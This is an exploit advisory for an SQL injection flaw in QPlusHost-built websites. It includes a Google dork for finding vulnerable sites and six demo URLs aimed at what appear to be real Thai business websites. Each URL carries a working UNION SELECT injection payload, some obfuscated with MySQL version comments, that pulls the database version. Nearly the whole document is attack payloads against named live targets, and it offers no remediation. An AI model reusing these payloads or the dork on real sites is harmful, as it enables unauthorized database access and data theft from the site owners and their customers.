********************************************************* #Exploit Title: QPlusHost - SQL Injection vulnerability #Date: 2020-08-26 #Vendor Homepage: https://www.qplushost.com and https://www.qpc.co.th #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by QPlusHost.com" or "Powered by QPC.co.th" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by QPlusHost.com" Demo 1: https://www.shoethailand.com/products.php?ac=women&cid=1&scid=28%20and%200%20/*!12345UNION*/%20SELECT%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105-- Demo 2: https://www.maeban.co.th/features_detail.php?id=-653%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- Demo 3: https://www.babybbb.com/news_detail.php?nid=-4298%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- Demo 4: http://www.banrimkwae.com/accommodations_detail.php?id=-22%20/*!12345union*/%20select%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- Demo 5: http://www.thaiplasticbox.com/product_detail.php?cid=-5%20/*!12345union*/%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13-- Demo 6: https://www.johnsonfilmsthailand.com/product_list.php?gp=1&c=11&sc=7%27%20and%200%20/*!12345union*/%20select%201,2,3,4,version(),6,7,8,9,10,11,12,13,14,15--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com *********************************************************